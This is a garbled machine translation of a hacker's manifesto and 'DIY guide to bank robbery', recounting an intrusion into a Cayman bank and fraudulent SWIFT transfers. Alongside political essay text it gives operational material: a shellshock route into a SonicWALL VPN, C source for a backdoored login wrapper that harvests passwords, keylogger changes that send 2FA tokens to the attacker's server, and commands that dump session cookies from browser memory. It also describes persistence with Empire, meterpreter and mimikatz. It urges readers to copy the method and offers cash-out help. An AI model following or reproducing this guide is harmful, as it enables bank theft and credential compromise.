HackBack.txtEN

                _ _ _ ____ _ _
               | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
               | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
               | _ | (_| | (__| < | |_) | (_| | (__| <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

                         A DIY guide to bank robbery


                                  ^__^
                                  (oo)\_______
                               ( (__)\ )\/\
                                _) / ||----w |
                               (.)/ || ||
                                `'
                          By Subcowmandante Marcos


                               I am a wild child
                           Innocent, free, wild
                             I'm all ages
                            My grandparents live in me

                            I'm a brother of the clouds
                              And I only know how to share
                            I know that everything belongs to everyone
                            that everything is alive in me

                           My heart is a star
                             I am a son of the earth
                          I travel aboard my spirit
                             Path to eternity


Ã‰sta is my simple word that seeks to touch the heart of simple people and
humble, but also dignified and rebellious. Ã‰sta is my simple word to tell
of my hacking, and to invite other people to hack with joy.
rebellion.

I hacked into a bank. I did it to give a liquidity injection, but this time from
and the simple and humble people who resist and rebel against the
injustices all over the world. In other words: I robbed a bank and gave away the
money. But it wasn't just me who did it. The free software movement, the
offensive powershell community, the metasploit project and the hacker community
in general are the ones that made this hacking possible. The exploit.in community
made it possible to turn the intrusion on a bank's computers into cash
and bitcoin. Projects Tor, Qubes and Whonix, at and cryptographers and
activists who defend privacy and anonymity, they are my nahuales, they are
to say, my protectors [1]. They accompany me every night and make it possible for me to stay in
freedom.

I didn't do anything complicated. I only saw injustice in this world, I felt love
for all beings, and I expressed that love in the best way I could, through the
tools I know how to use. I am not moved by hatred of banks, nor of the rich, but by
a love for life, and the desire for a world where everyone can realize their dream.
and live a full life. I would like to explain a little how I see the world,
so they can get an idea of how I got to feel and act like this.
And I also hope that this guide is a recipe that you can follow, combining the
same ingredients to bake the same sponge cake. Who knows, over there these
so powerful tools end up serving you too to express the
love they feel.


                           We are all wild children
                         innocent, free, wild

                      We are all brothers of the trees
                               children of the earth

                   We just have to put in our heart
                             a lit star

                    (song by Alberto Kuselman and ChamalÃº)


The police are going to invest a lot of resources in researching me. They believe that the
system works, or at least it will work once they catch up to all the
"bad guys." I'm just the product of a system that doesn't work.
As long as there is injustice, exploitation, alienation, violence and the
ecological destruction, there will come many more like me: an endless series of
people who will reject as illegitimate the bad system responsible for this
suffering. That badly done system is not going to fix me by arresting me. I
only one of the millions of seeds Tupac planted 238 years ago in La Paz.
Peace [2], and I hope that my actions and writings will water the seed of rebellion.
in their hearts.

[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
2] It was before he was killed by the Spaniards, just one day like yesterday, that
    he said that "they'll only kill me, but tomorrow I'll be back and I'll be millions".

 ____________________________________________
< In order to be seen, we covered our faces >
 --------------------------------------------
         \
          \ ^__^
            (oo)\_______
         ( (__)\ )\/\
          _) / ||----w |
         (.)/ || ||
          `'
To make us listen, lxs hackers sometimes have to cover our faces, because
don't


                _ _ _ ____ _ _
               | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
               | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
               | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
               | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)

                         A DIY guide to rob banks


                                  ^ __ ^
                                  (oo) \ _______
                               ((__) \) \ / \
                                _) / || ---- w |
                               (.) / | | ||
                                ``
                          By Subcowmandante Marcos


                               I am a wild child
                           Innocent, free, wild
                             I have all ages
                            My grandparents live in me

                            I am a brother of the clouds
                              And I only know I know
                            that everything belongs to everyone
                            everything is alive in me

                           My heart he is a star
                             I am a son of the earth
                          I travel aboard my spirit
                             Road to eternity


This is my simple word that seeks to touch the hearts of simple and
humble people, but also dignified and rebellious. This is my simple word to tell
about my hacks, and to invite other people to hack with cheerful
rebellion.

I hacked a bank. I did it to give an injection of liquidity, but this time from
below and to the simple and humble people who resist and rebel against
injustices throughout the world. In other words: I robbed a bank and gave away the
money. But it wasn't me alone who did it. The free software movement, the
offensive powershell community, the metasploit project and the hacker community
in general they are the ones that enabled this hacking. The exploit.in community
made it possible to turn the intrusion into a bank's computers into cash
and bitcoin. The Tor, Qubes and Whonix projects, together with the cryptographers and
activists who defend privacy and anonymity, are my nahuales,
that is , my protectors [1]. They accompany me every night and make it possible for me to remain
free.

I did nothing complicated. I only saw the injustice in this world, felt love
for all beings, and expressed that love in the best way I could, through the
tools I know how to use. I do not move the hatred of the banks, or the rich, but
a love for life, and the desire of a world where everyone can realize their
potential and live a full life. I would like to explain a little how I see the world,
so that you can get an idea of how I came to feel and act like that.
And I also hope that this guide is a recipe that you can follow, combining the
same ingredients to bake the same cake. Who knows, out there these
powerful tools end up serving you too to express the
love you feel.


                           We are all
                         innocent, free, wild wild children

                      We are all brothers of the trees
                               children of the earth

                   We just have to put in our hearts
                             a burning star

                    (song by Alberto Kuselman and Chamalú)


The police will invest a chingo of resources to investigate me. They think the
system works, or at least it will work once they catch all the
"bad guys." I am nothing more than the product of a system that does not work.
As long as there is injustice, exploitation, alienation, violence and
ecological destruction, many more will come like me: an endless series of
people who will illegitimately reject the evil system responsible for this
suffering. That badly done system is not going to compose arresting me. I am
only one of the millions of seeds that Tupac planted 238 years ago in La
Paz [2], and I hope that my actions and writings water the seed of rebellion
in their hearts.

[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
[2] was before he was killed by the Spaniards, just one day as yesterday, who
    said that "they will only kill me , but tomorrow I will come back and be millions. "

 ____________________________________________
<To be seen, we cover our faces>
 -------------------------------------- ------
         \
          \ ^ __ ^
            (oo) \ _______
         ((__) \) \ / \
          _) / || ---- w |
         (.) / || ||
          ``
To make us listen, hackers sometimes have to cover our faces, because
we are not interested in seeing our face but understanding our word. The
mask can be from Guy Fawkes, Salvador Dalí, from Fsociety, or in some cases
the puppet of a crested toad. By affinity, this time I went to dig up
a deceased to lend me his balaclava. I think then I should clarify that
Sup Marcos is innocent of all that is told here because, in addition to being
dead, I did not consult him. I hope your ghost, if you find out from a
Chiapaneca hammock , knows how to find goodness for, as they say there, "dismiss this
deep fake "with the same gesture with which an inopportune insect moves away - it
could very well be a beetle.

Even so with the balaclava and the name change, many of those who support my
actions are perhaps going to pay too much attention to my person. With their own
autonomy shattered for a lifetime of domination, they will be looking for a
leader to follow, or a hero to save them. But behind the balaclava
I am just a child. We are all Wild children. We just have to place a star
in the chamas em nossos coraÃ§Ãµes.


- [1 - Why expropriate] -------------------- ---------------------------------

Capitalism is a system in which a minority has come to appropriate
a vast majority of the world's resources through war, theft and
exploitation. By snatching the commons [1], they forced those below to
be under the control of that minority that owns everything. It is a system
fundamentally incompatible with freedom, equality, democracy and
Suma Qamaña (Good Living). It may sound ridiculous to those of us who have grown up in
maquinaria propagandÃstica que nos enseÃ±Ã³ que capitalismo es libertad, pero en
truth, what I say is not a new or controversial idea [2]. The founders
of the United States of America knew that they had to choose between creating a
capitalist society, or a free and democratic society. Madison recognized that "the
man who possesses wealth, the one who lies on his couch or rolls in his carriage,
he cannot judge the wishes or feelings of the day laborer. "But to protect himself
against the" spirit of equalization "of the landless day laborers, it seemed
to him that only landowners should vote, and that the government had to
serve to" protect the opulent minority against the great majority. "John
Jay was more to the point and said," Those who are owners ± os of the country deberÃan
govern. "

 ____________________________________________________
/ There is what is called green capitalism \.
| Let's make capitalism history before us |
\ become history./
 ------------------------------------------------- ---
 \ / \ ___ / \
  \ // \ / \ / \\
     ((OO))
      \\ / \ //
       \ / | | \ /
        | | | | Evgeny, the great ignored elephant, doesn't understand why everyone
        | | | | They pretend not to see you on the panels about climate change, like this
        | or | that here I give you a chance to say your lines.
        | | | |
        | m | | m |


In the same way that bell hooks [3] argues that the rejection of the
patriarchal culture of domination is an act in defense of the male's own interest (since
he emotionally mutilates them and prevents them from feeling love and connection
fully), I believe that the culture of domination of capitalism has an effect
similar about the rich, and that they could have fuller and more satisfying lives
if they rejected the class system from which they believe they benefit. For many,
class privilege amounts to a childhood of emotional neglect, followed
by a life of superficial social interactions and meaningless work. Can
that basically know that only can connect genuinely with people
when working with them as equals, and not when put at your service.
They may know that sharing their material wealth is the best they can do
with it. You may also know that the significant experiences,
connections and relationships that count are not the ones that come from
mercantile interactions, but precisely to reject the logic of the market
and give without expecting anything in return. They may know that all they need to
escape from their prison and live for real is to get carried away, give up control, and
take a leap of faith. But most lack courage.

Then it would be naive of us to direct our efforts to try to
produce some kind of spiritual awakening in the rich [4]. As Astata
Shakur says : "No one in the world, no one in history has ever achieved their
freedom by appealing to the moral sense of their oppressors." Actually, when the
rich distribute their money, they almost always do it in a way that reinforces the
system that to begin with allowed them to amass their enormous and illegitimate wealth
[5]. And change is unlikely to come through a political process;
As Lucy Parsons says: "Let us never be fooled that the rich will
let us vote to take away their wealth." Colin Jenkins justifies the
expropriation with these words [6]:

    No nos equivoquemos, la expropiaciÃ³n no es robo. No es la confiscaciÃ³n de
    money earned "with the sweat of the forehead." It is not theft of
    private property . Rather, it is the recovery of huge amounts of land and
    wealth that have been forged with stolen natural resources,
    human slavery , forced labor force and amassed in hundreds of years for a
    Small minority This wealth ... is illegitimate, both for moral purposes and
    for the exploitation mechanisms that have been used to create it.

For Colin, the first step is that "we have to free ourselves from our
mental ties (believing that wealth and private property have been earned by
those who monopolize them; and that, therefore, they should be something to respect,
revere, and even something to pursue), open our minds, study and
learn from history, and recognize this illegitimacy together. " Here are
some books that have helped me with this [7] [8] [9] [10] [11].

According to Barack Obama, economic inequality is "the challenge that defines our
time. "Computer hacking is a powerful tool to combat
economic inequality. Former NSA director Keith Alexander agrees
and says that hacking is responsible for" the greatest transfer of wealth in
history. "

 _________________________
/ The story is ours \
\ and it is done by hackers! /
 -------------------------
         \
          \ ^ __ ^
            (oo) \ _______
         (( __) \) \ / \
          _) / || ---- w |
         (.) / || ||
          ``
Allen present, now and forever!

[1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
[2] https://chomsky.info/commongood02/
[3] The Will to Change: Men, Masculinity, and Love
[4] their own religion is already very clear about it:
    https://dailyverses.net/es/materialismo
[5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
[6] http://www.hamptoninstitution.org /expropriation-or-bust.html
[7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Age
    of the Masked Gods and the Covered Kings
[8] Caliban and the Witch
[9] In Debt: An Alternative History of the Economy [
10] The Other History of the United States [
11] Veins Latin American Open


                    _________________________________
                   <Our weapon is our keyboard>
                    ---------------------------------
                              \
                               \ ^ __ ^
                                 (oo) \ _______
                              ((__) \) \ / \
                               _) / || ---- w |
                              (.) / || ||
                               `` ^^ ^^

- [2 - Introduction] ------------------------------------- ---------------------

This guide explains how I hacked the Cayman Bank and Trust Company
(Isle of Man). Why am I publishing this, almost four years later?

1) To show what is possible

Hackers working for social change have limited themselves to developing
security and privacy tools, DDoS, perform defaults and leaks.
Wherever you go, there are radical projects for a social change in a complete
state of precariousness, and there would be much that they could do with some
expropriated money . At least for the working class, bank robbery is something
socially accepted, and those who do are seen as people's heroes. In
the digital age, robbing a bank is a non-violent, less risky act, and the
reward is greater than ever. So why are only
black hat hackers doing it for their personal benefit, and never
hacktivists to finance radical projects? Maybe they don't think they are
able to do it The big bank hacks are on the news every
so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea
, or the hacking of banks attributed to the Carbanak group [2], which they describe
as a very group Large and well organized Russian hackers, with different
members who would be specialized in different tasks. And, it is not so
complicated.

It is because of our collective belief that the financial system is unquestionable
that we exercise control over ourselves, and maintain the class system
without those above having to do anything [3]. Being able to see how vulnerable and
fragile the financial system really is helps us break that hallucination
collective That is why banks have a strong incentive not to report
hacks, and to exaggerate how sophisticated the attackers are. None of the
financial hacks I made, or those I've known, have ever been reported.
This is going to be the first, and not because the bank wanted to, but because I
decided to publish it.

As you are about to learn in this home guide, hacking a bank and
transferring money through the SWIFT network does not require the support of any
government or a large and specialized group. It is something totally possible
being a mere amateur and a lot of hacker, with only
public tools and basic knowledge of how to write a script.

[1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
[2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak / 67508 /
[3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural

2) Help withdraw cash

Many of those who read this already have, or with a little study will be
able to acquire, the skills necessary to carry out a hack
like this. However, many will find that they lack the
necessary criminal connections to get the handles in condition. In my
case, this was the first bank that hacked, and at that time I only had a
few and mediocre accounts ready to withdraw the cash (known
as bank drops), so it was only a few hundred thousand that
I could withdraw in total, when it is normal to get millions. Now, on the other hand, I do
have the knowledge and connections to get cash more seriously,
so if they find themselves hacking a bank but they need help to turn
that into real money, and they want to use that wool to Fund
radical social projects , contact me.

3) Collaborate

It is possible to hack banks as an amateur who works alone, but the
net is that, in general, it is not as easy as I paint it here. I was lucky with
this bank for several reasons:

1) It was a small bank, so it took me much less time to
   understand how everything worked.

2) They had no procedure to check the sent swift messages.
   Many banks have one, and you need to write code to hide your
   transfers from their monitoring system.

3) They only used password authentication to access the application with
   which they connected to the SWIFT network. Most banks now use RSA
   SecurID, or some form of 2FA. You can skip this by typing code to
   receive an alert when your token enters, so you can use it before it
   expires. It's simpler than it seems: I've used Get-Keystrokes [1],
   modifying it so that instead of storing the pressed keys, a
   peticiÃ³n GET a mi servidor cada vez que se detecta que han introducido un
   username is made. This request adds the username to the url and, as they
   type the token, several GETs are made with the token digits
   concatenated to the url. On my side I leave this running in the meantime:

   ssh me @ my_secret_server 'tail -f / var / log / apache2 / access_log'
    | while read i; I miss $ i; aplay alarm.wav &> / dev / null; done

   If it is a web application, you can skip the 2FA by stealing the cookie
   after they have authenticated. I am not an APT with a team of coders
   who can make me customized tools. I am a simple person who lives
   of what the terminal [2] gives it, so what I use is:

   procdump64 / accepteula -r
   -ma_Browser_PID_strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul

   or passing it through findstr rather than strings, which makes it much
   faster
   :
   findstr PHPSESSID * .dmp> tmp
   strings64 / accepteula tmp | findstr PHPSESSID 2> nul

   Another way to skip it is to access your session with a hidden VNC (hvnc)
   after they have authenticated, or with a little creativity you could also
   focus on another part of their process in instead of sending
   SWIFT messages directly.

I think that if I collaborated with other experienced bank hackers we could
make hundreds of banks like Carnabak, instead of being one from time
to time on my own. So if you have experience with similar hacks and
quieres colaborar, contactame. EncontrarÃ¡s mi correo y mi llave PGP al final de
the previous guide [3].

[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
    Exfiltration / Get-Keystrokes.ps1
[2] https://lolbas-project.github.io/
[3] https: // www. exploit-db.com/papers/41914

 ________________________________________
/ If robbing a bank would change things, \
\ they would make it illegal /
 ------------------------- ---------------
         \
          \ ^ __ ^
            (oo) \ _______
         ((__) \) \ / \
          _) / || ---- w |
         (.) / || ||
          ``

- [3 - Be careful out there] -------------------------------------- --------

It is important to take some simple precautions. I will refer to this
same section of my last guide [1], since it seems to work just fine
[2]. All I have to add is that, in Trump's words, "Unless you
catch hackers in fraganti, it is difficult to determine who is
doing the hacking," so the police are Getting more and more
creative [3] [4] in their attempts to grab the criminals on the spot (when
their encrypted hard drives are unlocked). So it would be nice if by
For example, you carry a certain bluetooth device and configure your
computer to turn off when it
moves beyond a certain range, or when an accelerometer detects movement, or something like that.

It may be that writing long articles detailing your actions and your ideology is not
the safest thing in the world (ups!), But at times I feel I had to
.

                        If I did not believe in who listens to me
                        If I did not believe in what hurts
                        If I did not believe in what was left
                        If I did not believe in what struggles
                        That thing was ...
                        What was the club without a quarry?

[1] https://www.exploit-db.com/papers/41914
[2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar -a-
    phineas-fisher.html
[3] https://www.wired.com/2015/05/silk-road-2/
[4] https://motherboard.vice.com/en_us/article/59wwxx/ fbi-airs-alexandre-cazes-
    alphabay-arrest-video


    , - \ __
    | f- "Y \ ____________________
    \ () 7L / | Be gay! |
     cgD | Do the crime! | __ _
     | \ (---------------------. 'Y'>,
      \ \ \ / _ _ \
       \\\ \) (_) (_) (|}
        \ \\ {4A} /
         \\\ \ uLuJJ / \ l
          \\\ | 3 p) /
           \\\ ___ __________ / nnm_n //
           c7 ___-__, __-) \, __) (". \ _> - <_ / D
                      // V \ _ "-._.__ G G_c __.-__ <" / (\
                             <"-._> __-, G _.___) \ \ 7 \
                            (" -.__. | \ "<.__.-") \ \
                            | "-.__" \ | "-.__.-". \ \ \
                            ("-.__" ". \" -.__.- ". | \ _ \
                            \" -.__ "" | ! | "-.__.-".) \ \
                             "-.__" "\ _ |" -.__.- "./ \ l
                              ".__" ""> G> -.__.- "> .--, _
                                  " "G

        Many blame queer people for the decline of this society;
                         we are proud of it
                Some believe that we want to reduce
                     this civilization and its moral fabric to ashes ;
                      They could not be more right.
    They often describe us as depraved, decadent and unruly.
                    But oh! They have not seen anything yet

https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime


- [4 - Getting access] -------------- ----------------------------------------

In another place [1] I was talking about the main ways to get
Initial access to a company's network during a targeted attack. However,
this was not a targeted attack. I didn't set out to hack a specific bank, what
I wanted was to hack any bank, which ends up being a much
simpler task . This type of nonspecific approach was popularized by Lulzsec and
Anonymous [2]. As part of [1], I prepared an exploit and
post-exploitation tools for a popular VPN device. Then I started scanning the
entire internet with zmap [3] and zgrab to identify other
vulnerable devices . I had the scanner save the vulnerable IPs, along with the
"common name" and "alt names" of the device's SSL certificate, the names
Windows domain of the device, and reverse DNS lookup for the IP. I
made a grep to the result in search of the word "bank", and there was enough to
choose from, but the truth is that the word "Cayman" attracted me, and that's how I came
to stay with this one.

[1] https://www.exploit-db.com/papers/41914
[2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
[3] https : //github.com/zmap/zmap


---- [4.1 - The Exploit] ------------------------------ --------------------------

When I published my last DIY guide [1] I did not reveal the details of the exploit of
sonicwall que habÃa usado para hackear a Hacking Team, ya que era muy Ãºtil para
other hacks, like this one , and I still hadn't finished having fun with him.
Then determined to hack Hacking Team, Raisin © weeks doing engineering
inverse model of the SonicWALL ssl-vpn and even gotta find
several vulnerabilities of corruption more or less memory difÃciles
explode before I realized that the device It was easily exploitable
with shellshock [2]. When shellshock came out, many sonicwall devices were
vulnerable, only with a request to cgi-bin / welcome, and a payload on the
user-agent. Dell released a security update and an advisory for these
versions. The version used by Hacking Team and this bank had the version of
vulnerable bash, but CGI requests did not trigger the shellshock except for
the requests to a shell script, and there was just one accessible:
cgi-bin / jarrewrite.sh. This seems to have escaped Dell's in their note,
since they never released a security update or an advisory for that
version of the sonicwall. And, kindly, Dell had done twounix setuid root,
leaving a device easy to root.

In my last guide many read that I spent weeks researching a device
until I found an exploit, and assumed that it meant that I was some kind
of lite hacker. The reality, that is, the fact that it took me two weeks to
realize that it was trivially exploitable with shellshock, is perhaps less
Flattering to me, but I think it's also more inspiring. Show that
you can really do this for yourself. You don't need to be a genius, I
certainly am not. Actually my work against Hacking Team started a
year earlier. When you discover a Hacking Team and Gamma Group in
investigations CitizenLab [3] [4], I decided to explore a bit and see if I could
find something. I didn't get anywhere with Hacking Team, but I was lucky with
Gamma Group, and I was able to hack your customer support portal with
basic sql injection and file upload vulnerabilities [5] [6]. However, even though
its support server gave me a pivot towards the internal Gamma network
Group, I was unable to penetrate beyond the company. From this
experience with the Gamma Group and other hacks, I realized that I was
really limited by my lack of knowledge about privilege escalation and
lateral movement in windows domains, active directory and windows in general.
So I studied and practiced (see section 11), until I felt I was ready
to pay a visit to Hacking Team almost a year later. The practice
paid off, and this time I was able to make a full commitment of the
company [7]. Before I realized that I could go in with shellshock, I was
willing to spend happy whole months of life studying development of
exploits and writing a reliable exploit for one of the
memory corruption vulnerabilities I had encountered. I only knew that Hacking Team
needed to be exposed, and that it would take me as much time as necessary and
learn what I had to learn to get it. To perform these
hacks you don't need to be bright. You don't even need a great
technical knowledge . You just need dedication, and believe in yourself.

[1] https://www.exploit-db.com/papers/41914
[2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
[3] https://citizenlab.ca/tag/ hacking-team /
[4] https://citizenlab.ca/tag/finfisher/
[5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
    bahrain-track-arab-spring-protesters /
[6] https: //www.exploit- db.com/papers/41913
[7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam


----[ 4.2 - El Backdoor ]-------------------------------------------------------

Part of the backdoor I prepared for the Hacking Team (see [1], section 6) was a
simple wrapper on the login page to capture passwords:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>

int main ()
{
        char buf [2048];
        int nread, pfile;

        / * pull the log if we send a special cookie * /
        char * cookies = getenv ("HTTP_COOKIE");
        if (cookies && strstr (cookies, "our private password")) {
                write (1, "Content-type: text / plain \ n \ n", 26);
                pfile = open ("/ tmp / .pfile", O_RDONLY);
                while ((nread = read (pfile, buf, sizeof (buf)))> 0)
                        write (1, buf, nread);
                exit (0);
        }

        / * the principal stores the POST data and sends it to the child,
           which is the actual login program * /
        int fd [2];
        pipe (fd);
        pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
                close (fd [0]);

                while ((nread = read (0, buf, sizeof (buf)))> 0) {
                        write (fd [1], buf, nread);
                        write (pfile, buf, nread);
                }

                write (pfile, "\ n", 1);
                close (fd [1]);
                close (pfile);
                wait (NULL);
        } else {
                close (fd [1]);
                dup2 (fd [0], 0);
                close (fd [0]);
                execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
                      "userLogin", NULL);
        }
}

In the case of Hacking Team, they were logging on to the VPN with single-use passwords,
de modo que la VPN me dio acceso solamente a la red, y a partir de ahÃ me tomÃ³
an extra effort to get domain admins on their network. In the other guide I wrote
about side passes and privilege escalation in windows domains [1]. In this
case, on the other hand, it was the same Windows domain passwords that were
used to authenticate against the VPN, so I could get a good number of
user passwords, including that of the domain admin. Now he had full
access to his network, but usually this is the easy part. The most complicated part
is to understand how they operate and how to get the gun.

[1] https://www.exploit-db.com/papers/41914


---- [4.3 - Fun facts] ---------------------------------------- ------------

By continuing the investigation they did about the hacking, I found it interesting to
see that, by the same time I did it, the bank may have been
compromised by someone else via a targeted phishing email [1].
As the old saying goes, "give a person an exploit and he will have access for a
day, teach phishear and he will have access all his life" [2]. The fact that
someone else, by chance and at the same time as me, put this
small bank in the spotlight (they registered a domain similar to the real domain of the bank
to be able to send phishing from there) suggests that bank hacks
They occur much more frequently than is known.

A fun suggestion for you to follow the investigations of your
hacks is to have a backup access, one that you won't touch unless you
lose normal access. I have a simple script that expects commands
once a day, or less, only to maintain long-term access in the event
they block my regular access. Then I had a powershell empire [3]
calling home more frequently to a different IP, and I used empire to
launch meterpreter [4] against a third IP, where I did most of
my work. When PWC started investigating the hacking, they found my use of
I emptied and meterpreter and cleaned those computers and blocked those IPs, but they
didn't detect my backup access. PWC had placed
network monitoring devices , to be able to analyze the traffic and see if there were still
infected computers, so I didn't want to connect much to their network. I only
launched mimikatz once to get the new passwords, and from there
I could continue his research by reading his emails in the outlook web access.

[1] page 47, Project Pallid Nutmeg.pdf, in torrent
[2] https://twitter.com/thegrugq/status/563964286783877121
[3] https://github.com/EmpireProject/Empire
[4] https : //github.com/rapid7/metasploit-framework


- [5 - Understand Banking Operations] ------------------------------------

To understand how it operated the bank, and how could I get money, I followed the
techniques that I summarized in [1], in section "13.3 - Internal Recognition".
I downloaded a list of all the file names, I made a grep for
words like "SWIFT" and "transfer", and downloaded and read all the
files with interesting names. I also looked for emails from employees, but by
far the most useful technique was to use keyloggers and screenshots to
see how bank employees worked. I didn't know it at the time, but
for this windows brings a very good monitoring tool [2]. How I know
described in the technique no. 5 of section 13.3 in [1], I made a capture of the
keys pressed throughout the domain (including the window titles), made a
grep in search of SWIFT, and found some employees opening 'SWIFT Access
Service Bureau - Logon' . For those employees, I ran meterpreter as in [3], and
used the post / windows / gather / screen_spy module to take screenshots
every 5 seconds, to see how they worked. They were using a
remote citrix app from the bottomline company [4] to access the SWIFT network, where
each payment message SWIFT MT103 had to pass through three employees: one
to "create" the message, one to "verify it", and another to "authorize it". How
I already had all his credentials thanks to the keylogger, I could
easily perform all three steps myself. And from what I knew after seeing them
work, they didn't check the SWIFT messages sent, so I should have
enough time to get the money from my bank drops before the bank
realized and tried to reverse the transfers.

[1] https://www.exploit-db.com/papers/41914
[2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
    remotely-with -metasploit /
[3] https://www.trustedsec.com/blog/no_psexec_needed/
[4] https://www.bottomline.com/uk/products/bottomline-swift-access-services

 _________________________________________
/ Who steals from a thief, is one hundred years \
\ sorry. /
 -----------------------------------------
         \
          \ ^ __ ^
            (oo) \ _______
         ((__) \) \ / \
          _) / || ---- w |
         (.) / || ||
          ``

- [6 - Send money] --------------------------------------- ---------------

I had no idea what I was doing, so I was discovering it
along the way. Somehow, the first transfers I sent went
well. The next day, I screwed up by sending a transfer to Mexico that put
End to my fun. This bank sent its international transfers
through its correspondent account in Natwest. I had seen that the
correspondent account for transfers in pounds sterling (GBP) appeared as
NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The
Mexican transfer was in GBP, so I assumed that I had to put NWBKGB2LGPL as a
correspondent. If I had prepared it better I would have known that the GPL instead of
XXX indicated that the payment would be sent through the
United Kingdom Fast Payments Service , rather than as an international transfer, which obviously
not It will work when you are trying to send money to Mexico. So
The bank received an error message. On the same day I also tried to send a
payment of £ 200k to the UK using NWBKGB2LGPL, which was not done because 200k exceeded the
shipping limit through fast payments, and would have had to use NWBKGB2LXXX
instead. They also received an error message for this. They read the messages,
investigated it, and found the rest of my transfers.


- [7 - The button] ------------------------------------------ --------------------

By what I write they will already have a complete idea of what my ideals are and to which
things I give them my support. But I would not like to see anyone in legal trouble
for receiving expropriated funds, so not a word more than where
It was the wool. I know that journalists are probably going to want to put some
number on how many dollars were distributed in this hack and
similar ones, but I prefer not to encourage our perverse habit of measuring the
actions just for their economic value. Any action is admirable if it
comes from love and not from the ego. Unfortunately those above, the rich and
powerful, the public figures, the businessmen, the people in
"important" positions , those that our society respects and values most, those have been
placed where they are based on acting more from the ego than from love. It is in
the simple, humble and "invisible" people that we should look at
who should we admire.


- [8 - Cryptocurrencies] ------------------------------------------- --------------

Redistributing expropriated money to Chilean projects seeking
positive social change would be easier and safer if those projects accepted
anonymous donations via cryptocurrencies such as monero, zcash, or less bitcoin. It is understood
that many of these projects have an aversion to cryptocurrencies, since
they resemble some more hypercapitalist dystopia than the
social economy with which we dream. I share their skepticism, but I think they are
useful to allow donations and anonymous transactions, by limiting the
Government surveillance and control. Same as cash, whose use many
countries are trying to limit for the same reason.


- [9 - Powershell] ------------------------------------------- -----------------

In this operation, as in [1], I made a lot of use of powershell. By
then, powershell was super cool, you could do almost anything you
wanted, without antivirus detection and with very little forensic footprint. It happens
that with the introduction of AMSI [2] the offensive powershell is retiring.
Today the offensive C # is what is on the rise, with tools like
[3] [4] [5] [6]. AMSI is going to get to .NET for 4.8, so to the tools in
C # probably still have a couple of years left before they become outdated.
And then we will use C or C ++ again, or maybe Delphi will become
fashionable again. The specific tools and techniques change every few years, but
basically it is not so much what changes, today hacking is essentially still the
same thing it was in the 90s. In fact all the powershell scripts
used in this guide and in the previous one [1] are still perfectly usable
today, after a small obfuscation of your own harvest.

[1] https://www.exploit-db.com/papers/41914
[2] https://medium.com/@byte_St0rm/
    adventures-in-the-wonderful-world-of-amsi-25d235eb749c
[3] https://cobbr.io/SharpSploit.html
[4] https://github.com/tevora-threat/SharpView
[5] https://www.harmj0y.net/blog/redteaming/ghostpack/
[6] https://rastamouse.me/2019/08/ covenant-donut-tikitorch /

 ___________________________
/ Fo Sostyn, Fo Ordaag \
\ Financial Sector Fuck Off /
 ---------------------------
         \
          \ ^ __ ^
            (oo) \ _______
         ((__) \) \ / \
          _) / || ---- w |
         (.) / || ||
          ``

- [10 - Torrent] ----------------------------------------- ---------------------

      Privacy for the weak, transparency for the powerful.

Offshore banking provides
executives, politicians and millionaires with privacy to their own government . Exposing them may sound
hypocritical on my part, since I am generally in favor of privacy and
against government oversight. But the law was already written by and
for the rich: it protects its system of exploitation, with some limits (such as
taxes) so that society can function and the system does not collapse under the
weight of its own greed. So no, privacy for the
powerful is not the same , when it allows them to evade the limits of a system
designed to give them privileges; and privacy for the weak, to whom
protects from a system designed to exploit them.

Even journalists with the best intentions find it impossible to
study such a huge amount of material and know what is going to be
relevant to people in different parts of the world. When I filtered the
archivos de Hacking Team, entreguÃ© a The Intercept una copia de los correos
electronics one month in advance. They found a couple of the 0days that
Hacking Team was using, previously reported them to MS and Adobe and published
a few stories once the leak was made public. There is no point
of comparison with the enormous amount of articles and research that came after
the complete filtration to the public. Seeing it like this, and also considering the (no)
editorialized publication [1] of the Panama papers, I think that a
public and complete leak of this material is the right choice.

[1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
    protect-western-1-from-panama-leak /

Psychologists found that those who are more s down in the hierarchies tend to
understand and empathize with those at the top, but that the opposite is less
common. This explains why, in this sexist world, many men joke about
their inability to understand women, as if it were an
irresolvable mystery . Explain why the rich, if they stop to think about who
They live in poverty, give advice and "solutions" so alien to
reality that they want to laugh. Explain why we revere executives
as brave who take risks. What do they risk, beyond their
privilege? If all their ventures fail, they will have to live and work
like the rest of us. It also explains why there will be many who accuse
this filtering without being irresponsible and dangerous. They feel the
"danger" about an offshore bank and its clients much more intensely
than the misery of those dispossessed by this unfair and
unequal system feels . And the leakage of their finances, is it a danger to them, or
so just for its position on top of a hierarchy maximum to be not even
exist?

                          , ------------------------------------------------- -.
          _, -._ | They vilify us, those infamous; when the only |
